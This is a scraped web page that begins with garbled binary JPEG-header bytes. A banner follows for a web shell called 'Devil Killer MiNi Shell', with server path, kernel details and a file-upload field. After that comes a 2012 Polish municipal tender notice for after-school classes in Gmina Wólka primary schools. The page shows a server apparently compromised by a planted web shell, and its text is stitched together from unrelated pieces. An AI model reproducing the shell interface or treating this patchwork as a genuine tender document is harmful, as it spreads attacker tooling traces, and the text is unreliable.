JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120806/288168-N-2012.html

<p class="kh_header"><b>Lublin: Ćwiczenia czynią Mistrza - indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wólka</b><br>
<b>Numer ogłoszenia: 288168 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wólka , Jakubowice Murowane 8, 20-258 Lublin, woj. lubelskie, tel. 081 7464844, 7510060, faks 081 7465001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wolka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ćwiczenia czynią Mistrza - indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Wólka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br /> Przedmiotem zamówienia są usługi polegające na prowadzeniu zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego uczniów klas I-III w szkołach podstawowych, dla których organem prowadzącym jest Gmina Wólka. Zamówienie realizowane jest w ramach projektu pn. Indywidualizacja procesu nauczania  i wychowania uczniów klas I-III szkół podstawowych w Gminie Wólka, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych oraz budżetu państwa. 
<br />Numer projektu: POKL.09.01.02-06-249/11
<br />Zamówienie obejmuje: 
<br />1. Opracowanie programu i planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi placówki oświatowej, w której prowadzone są zajęcia. Program i plan pracy zajęć pozalekcyjnych musi być opracowany zgodnie z następującymi aktami prawnymi: Rozporządzenie Ministra Edukacji Narodowej i Sportu z dnia 7 stycznia 2003r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach, placówkach (Dz. U. Nr 11, poz. 114), Rozporządzenie Ministra Edukacji Narodowej z dnia 17 listopada 2010r. w  sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach, placówkach (Dz.U. Nr 228, poz.1487), Rozporządzenie Ministra Edukacji Narodowej i Sportu z dnia 12 lutego 2002r. w sprawie ramowych planów nauczania w szkołach publicznych (Dz.U. Nr 15, poz. 142 z późn. zm)
<br />2. Prowadzenie zajęć pozalekcyjnych w ilości i miejscu przewidzianym dla danej części zamówienia według zaakceptowanego programu zajęć, przy czym godzina zajęciowa równa jest 45 minut pracy z uczniami. Czas przejazdu z dziećmi w przypadku zajęć pozaszkolnych (wycieczka, zajęcia na basenie) nie jest wliczany do czasu prowadzenia zajęć, a wynagrodzenie za czas poświęcony na przejazdy powinno być ujęte odpowiednio w zaoferowanej stawce za godzinę zajęciową. 
<br />3. Dokumentowanie zajęć pozalekcyjnych w dzienniku zajęć i listach obecności,
<br />4. Sprawowanie opieki nad uczniami w czasie zajęć, a w przypadku wyjazdów również podczas podróży.
<br />5. przeprowadzanie i analiza wstępnych i końcowych testów kompetencji,
<br />6. sporządzenie ocen opisowych postępów dla dzieci uczestniczących w zajęciach.
<br />7. Zajęcia realizowane będą w następujących placówkach:
<br />- Szkole Podstawowej w Sobianowicach, Sobianowice 32a, 20-258 Lublin
<br />- Szkole Podstawowej w Pliszczynie, Kolonia Pliszczyn 100, 20-258 Lublin
<br />- Szkole Podstawowej w Turce, Turka 294, 20-258 Lublin
<br />- Szkole Podstawowej w Świdniku Małym, Świdnik Mały 39, 20-258 Lublin
<br />- Szkole Podstawowej w Łuszczowie, Łuszczów Drugi 102, 20-258 Lublin
<br />- zajęcia na basenie rozpoczynają się i kończą w wymieniony wyżej placówkach oświatowych, z których zamawiający zapewnia przejazd w obie strony do basenu. 
<br />8. Przedmiot zamówienia obejmuje następujące rodzaje zajęć:
<br />- zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji
<br />- zajęcia logopedyczne dla dzieci z zaburzeniami mowy
<br />- gimnastyka korekcyjna dla dzieci z wadami postawy
<br />- zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych (w tym jednodniowy wyjazd do Centrum Nauki KOPERNIK w Warszawie)
<br />- zajęcia gimnastyki korekcyjnej na basenie
<br />9. Godziny prowadzenia zajęć muszą być dostosowane do planu lekcji dzieci. Z tego względu przedmiot zamówienia jest podzielony na 25 części w taki sposób, że zajęcia obejmujące jedną część zamówienia może prowadzić jeden nauczyciel. W przypadku gdy wykonawca składa ofertę na więcej niż jedną część zamówienia powinien dysponować co najmniej jednym nauczycielem na każdą cześć zamówienia ponieważ zajęcia obejmujące różne części zamówienia mogą odbywać się w tym samym czasie.
<br />10. Poniżej wymienione są poszczególne odrębne części zamówienia z podziałem na szkoły, liczbę godzin, grupy dzieci oraz planowaną liczbę dzieci w grupie. Liczby dzieci i godzin mogą ulec nieznacznym zmianom w przypadku, gdy któreś z dzieci wstępnie zakwalifikowanych do projektu zrezygnuje z udziału z powodu czynników nieprzewidywalnych. 
<br />Wykonawca może złożyć ofertę na dowolną ilość części zamówienia.
W przypadku gdy dwie lub więcej części zamówienia są równoważne (ta sama liczba godzin, grup i miejsce) np. część 7, 8 i 9, złożenie oferty na  jedną z tych części oznacza złożenie oferty bez wskazania numeru części,  czyli na część 7 lub 8 lub 9. Analogicznie gdy wykonawca złoży ofertę na dwie części zamówienia a jest np. 3 równoważne części zamówienia to oznacza złożenie oferty na część 7 i 8 lub 7 i 9 lub 8 i 9. Równoważne części zamówienia będą rozpatrywane i porównywane jednocześnie. A więc w omówionym przykładzie jako najkorzystniejsze zostaną wybrane 3 najtańsze oferty ze wszystkich ofert złożonych na części  7 lub 8 lub 9. Oznacza to,  że np. wykonawca składający ofertę na część 7 będzie realizował np. równoważną część 8 bo jego oferta jest druga w kolejności pod względem ceny.
<br />
Część 1. (równoważna z cz.2)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Dwie grupy po 3 dzieci. Łącznie 60 godzin (30+30).
<br />Część 2. (równoważna z cz.1)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Dwie grupy od 3 do 4 dzieci. Łącznie 60 godzin (30+30).
<br />Część 3. (równoważna z cz.4)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Dwie grupy po 4 dzieci. Łącznie 60 godzin (30+30).
<br />Część 4. (równoważna z cz.3)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Dwie grupy po 4 dzieci. Łącznie 60 godzin (30+30).
<br />Część 5.
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Jedna grupa -4 dzieci. Łącznie 30 godzin.
<br />Część 6.
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Turce. Dwie grupy od 7 do 8 dzieci. Łącznie 72 godziny (36+36).
<br />Część 7. (równoważna z cz.8 i cz.9)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Jedna grupa -3 dzieci. Łącznie 36 godzin.
<br />Część 8. (równoważna z cz.7 i cz.9)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Jedna grupa -5 dzieci. Łącznie 36 godzin.
<br />Część 9. (równoważna z cz.7 i cz.8)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Jedna grupa -3 dzieci. Łącznie 36 godzin.
<br />Część 10.
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Łuszczowie. Cztery  grupy od 4 do 5 dzieci. Łącznie 130 godzin (40+30+30+30).
<br />Część 11.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Cztery  grupy od 3 do 4 dzieci. Łącznie 120 godzin (30+30+30+30).
<br />Część 12.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Pięć  grup od 3 do 4 dzieci. Łącznie 150 godzin (30+30+30+30+30).
<br />Część 13.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Turce. Trzy grupy od 2 do 5 dzieci. Łącznie 120 godzin (40+40+40).
<br />Część 14.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Dwie grupy po 3 dzieci. Łącznie 72 godziny (36+36).
<br />Część 15.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Łuszczowie. Trzy grupy od 3 do 4 dzieci. Łącznie 130 godzin (40+45+45).
<br />Część 16.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Cztery  grupy od 4 do 5 dzieci. Łącznie 120 godzin (30+30+30+30).
<br />Część 17.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Jedna  grupa - 3 dzieci. Łącznie 30 godzin.
<br />Część 18 (równoważna z cz.19).
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Dwie grupy po 3 dzieci. Łącznie 60 godzin (30+30).
<br />Część 19 (równoważna z cz.18).
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Dwie grupy po 4 dzieci. Łącznie 60 godzin (30+30).
<br />Część 20.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Turce. Trzy grupy od 6 do 10 dzieci. Łącznie 108 godzin (48+30+30).
<br />Część 21.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Trzy grupy po 8 dzieci. Łącznie 72 godziny (24+24+24).
<br />Część 22.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Łuszczowie. Cztery  grupy od 5 do 8 dzieci. Łącznie 130 godzin (30+30+30+40).
<br />Część 23.
<br />Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych. Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Jedna  grupa - 9 dzieci. Łącznie 30 godzin.
<br />Część 24 (równoważna z cz.25).
<br />Zajęcia gimnastyki korekcyjnej na basenie. Miejsce prowadzenia zajęć: kolejno każda szkoła odpowiednio dla każdej grupy  - miejscem rozpoczęcia i zakończenia zajęć jest szkoła, z której zapewniony jest przez zamawiającego transport na basen. Cztery grupy od 9 do 12 dzieci. Łącznie 50 godzin (10+10+10+10+10).
<br />Część 25 (równoważna z cz.24).
<br />Zajęcia gimnastyki korekcyjnej na basenie. Miejsce prowadzenia zajęć: kolejno każda szkoła odpowiednio dla każdej grupy (Sobianowice, Turka, Pliszczyn, Świdnik Mały, Łuszczów)  - miejscem rozpoczęcia i zakończenia zajęć jest szkoła, z której zapewniony jest przez zamawiającego transport na basen. Cztery grupy od 9 do 12 dzieci. Łącznie 50 godzin (10+10+10+10+10)
<br /><br />Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej ani ustanowienie dynamicznego systemu zakupów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających do 50% wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia  podstawowego polegających na powtórzeniu tego  samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek jeśli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu
<br />
Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez wykonawców oświadczenia. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę <b>spełnia/nie spełnia</b>. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek jeśli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu
<br />
Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez wykonawców oświadczenia. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę <b>spełnia/nie spełnia</b>. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek jeśli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu
<br />
Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez wykonawców oświadczenia. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę <b>spełnia/nie spełnia</b>. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie minimum po jednej osobie na jedną część zamówienia, na którą wykonawca składa ofertę, posiadającą wykształcenie wyższe pedagogiczne lub licencjat w rozumieniu Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz. U. z 2009 r. nr 50, poz. 400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli.
Przy czym każda z tych osób musi posiadać doświadczenie zawodowe jako nauczyciel co najmniej 1 rok.
<br />Wykonawca spełni powyższe warunki jeśli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu i oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień.
<br />
Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez wykonawców oświadczenia. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę <b>spełnia/nie spełnia</b>. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek jeśli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu
<br />
Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez wykonawców oświadczenia. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę <b>spełnia/nie spełnia</b>. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne sa następujące zmiany:
<br />1. jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
<br />2. jeżeli zajdzie konieczność przedłużenia lub skrócenia okresu realizacji Projektu, stosownie do zmian harmonogramu rzeczowo-finansowego. Termin realizacji umowy zmienia się odpowiednio do okresu realizacji Projektu, bez prawa do dodatkowego wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wolka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> <br />Urząd Gminy Wólka, pok. 6,7<br />
Jakubowice Murowane 8<br />
20-258 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 10:00, miejsce: <br />Urząd Gminy Wólka, pok. 19-sekretariat<br />
Jakubowice Murowane 8<br />
20-258 Lublin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Indywidualizacja procesu nauczania  i wychowania uczniów klas I-III szkół podstawowych w Gminie Wólka, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Działanie 9.1 -Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty-, Poddziałanie 9.1.2 -Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych- oraz budżetu państwa. 
<br />Numer projektu: POKL.09.01.02-06-249/11.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
